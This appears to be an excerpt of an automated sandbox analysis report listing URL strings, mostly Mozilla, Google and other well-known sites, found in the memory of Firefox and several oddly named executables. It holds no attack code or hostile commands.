Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EFDF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B0F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-jscolor-mix(in
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelresource://gre/modules/PrivateBrowsingUtils.sys.
Source: file.exe, 00000000.00000003.1732680990.0000000005E71000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2606378273.000000000580E000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2738826950.0000000005AF2000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2806986423.0000000005B10000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: firefox.exe, 0000001D.00000002.2981878374.000001E76132B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/dispatchAsyncEvent/this._blockersPromi
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.3005403457.000001E764FC4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/Exception
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
Source: e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000003.2553620805.0000000029892000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: file.exe, 00000000.00000003.1732680990.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008AF000.00000040.00000001.01000000.00000009.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008A8000.00000040.00000001.01000000.00000009.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000003.2269794608.000000001D6EC000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2606378273.000000000580C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2606825892.0000000005805000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2738826950.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739201771.0000000005AE9000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2806986423.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2807333206.0000000005B07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: e192e43b61.exe, 0000000A.00000003.2606825892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739201771.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2807333206.0000000005AE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: file.exe, 00000000.00000003.1732680990.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008AF000.00000040.00000001.01000000.00000009.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008A8000.00000040.00000001.01000000.00000009.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000003.2269794608.000000001D6EC000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2606378273.000000000580C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2606825892.0000000005805000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2738826950.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739201771.0000000005AE9000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2806986423.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2807333206.0000000005B07000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: e192e43b61.exe, 0000000A.00000003.2606825892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739201771.0000000005AC4000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2807333206.0000000005AE2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.00000000008A8000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EE2D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://topsites.services.mozilla.com/cid/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://tracking-protection-issues.herokuapp.com/new
Source: firefox.exe, 0000001D.00000002.2981878374.000001E76132B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://versioncheck.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEM_ID
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-%CHANNEL%-browser&utm_campaig
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://vpn.mozilla.org/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campaign=about-pr
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://webcompat.com/issues/new
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://webextensions.settings.services.mozilla.com/v1
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641920304.00000000057CF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2802402716.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2868740203.000000000113A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2863569523.000001E76295D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2992758898.000001E7637C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2983605466.000001E762670000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/8bad2467092e6ddeb0dfa9e5ea54d86d26790ca7ba2ce88d1
Source: firefox.exe, 0000001D.00000002.2974606521.000001E75FD45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.de/
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1768311539.0000000001786000.00000004.00000020.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2582005430.0000000001332000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641920304.00000000057CF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2802402716.0000000005A98000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2851208400.000000000113B000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E5AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: file.exe, 00000000.00000003.1733332516.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733425645.0000000005E5A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733227360.0000000005E5C000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608259033.00000000057C8000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2608026179.00000000057DF000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2739808698.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2808155146.0000000005AF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/mozIGeckoMediaPluginChromeServiceipc:first-content-process-c
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2863569523.000001E76295D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2992758898.000001E7637C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2983605466.000001E762670000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2862321283.000001E76293E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000003.2861997289.000001E762920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/geolocation/v1/geolocate?key=%GOOGLE_LOCATION_SERVICE_API_KEY%
Source: firefox.exe, 0000001D.00000002.2967612350.000001E75EEE3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2946205914.00000099786FC000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.000000000087A000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.000000000087A000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.000000000087A000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.000000000087A000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/91
Source: file.exe, 00000000.00000003.1767913034.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000003.2553620805.0000000029892000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641410618.0000000005A18000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2785886618.0000000005BB5000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.000000000087A000.00000040.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/cQWpLyAVcZI.exe
Source: e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/new/
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000002.2580293430.000000000087A000.00000040.00000001.01000000.00000009.sdmp, firefox.exe, 0000001D.00000002.2963529504.000001E75E53C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD3A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 0000001D.00000002.2965944209.000001E75E980000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: file.exe, 00000000.00000003.1767913034.0000000005F3B000.00000004.00000800.00020000.00000000.sdmp, K7IHXYTNUQJPI2M9UU0ECLE1K.exe, 00000006.00000003.2553620805.0000000029892000.00000004.00000020.00020000.00000000.sdmp, e192e43b61.exe, 0000000A.00000003.2641410618.0000000005A18000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000B.00000003.2785886618.0000000005BB5000.00000004.00000800.00020000.00000000.sdmp, e192e43b61.exe, 0000000D.00000003.2850254055.0000000005BD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 0000001D.00000002.2946205914.00000099786FC000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EFAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2964932071.000001E75E6B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/cleanupTemporaryAddons/promise
Source: firefox.exe, 0000001D.00000002.2980396667.000001E760EA8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD82000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2974606521.000001E75FD5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/aInstanceID
